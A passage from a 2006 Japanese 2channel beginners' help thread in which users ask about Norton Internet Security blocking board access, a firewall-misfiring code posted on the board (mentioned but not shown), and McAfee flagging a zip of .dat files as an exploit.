- 414 名前:ひよこ名無しさん mailto:sage [2006/01/31(火) 10:16:03 ID:???]
- >>410
ansitu.xrea.jp/guidance/?Trap#It_does_not_cry
ここを読んでください
- 415 名前:ひよこ名無しさん mailto:sage [2006/01/31(火) 10:16:50 ID:???]
- >>410
この部分ね
2005年11月28日現在、2ちゃんねるではNIS(NPF)のファイアーウォールを誤作動させる
コードの書き込みが出回っています。
アンチウイルス(NAV)は反応しないのでファイアーウォールの
設定を見直さなければなりませんがあくまで暫定的処置です。
NIS2005の場合(多分NIS2006も同じ)
- 416 名前:ひよこ名無しさん [2006/01/31(火) 10:16:58 ID:nkcqfLth]
- >>411
解りました。m(__)mではどこで聞いても答えは一緒って事ですね。お手数おかけしました。また何かありましたら宜しくお願いします。
- 417 名前:VIP@命 ◆VIPPER/vT. [2006/01/31(火) 10:31:48 ID:nkcqfLth]
- あっ。ちなみにぼくは、愛新ではありません。
あしからず
- 418 名前:ひよこ名無しさん [2006/02/01(水) 13:48:25 ID:S10H/e1R]
- 時々ノートンインターネットセキュリティ2004を使用している際、
スレ、もしくは板そのものがサーバーに接続できなくて見ることができません。
アンチウィルスは常時つけていますが、切ってもつけていても見ることができるのですが
この症状はアンチウィルスが反応している訳ではありません
インターネットセキュリティをつけているときだけ見ることができないのですが
なぜなんでしょうか?
もちろんインターネットセキュリティの2CHに書き込める為の設定をしてあります。
これはなぜなんでしょうか?
- 419 名前:ひよこ名無しさん mailto:sage [2006/02/01(水) 13:55:37 ID:???]
- >>418
>>371の問題でもないってことでしょうか。
371の暫定対処をした場合はどうなりますか?
- 420 名前:418 [2006/02/01(水) 14:05:32 ID:S10H/e1R]
- >>419
ありがとうごぜーます。
呼んできます。
- 421 名前:ひよこ名無しさん [2006/02/02(木) 16:52:23 ID:KtbG8KDn]
- ■>>1-9を読みましたか? 『YES』
マカフィーを使っているのですがdatファイルの入ったzipファイルを解凍しようと
すると「Exploit-mhtresir.gen」が発見されたので削除しますと言われzipファイルの中のdatを
他の場所に保存することもdatファイルを使うことも出来ないのですがどうすれば
zipファイルを解凍して中のdatファイルを使えるようになりますか?
OSはXP
アンチウイルスソフトはManaged virusScan plas AntiSpywareです。
お願いします。
|
 |
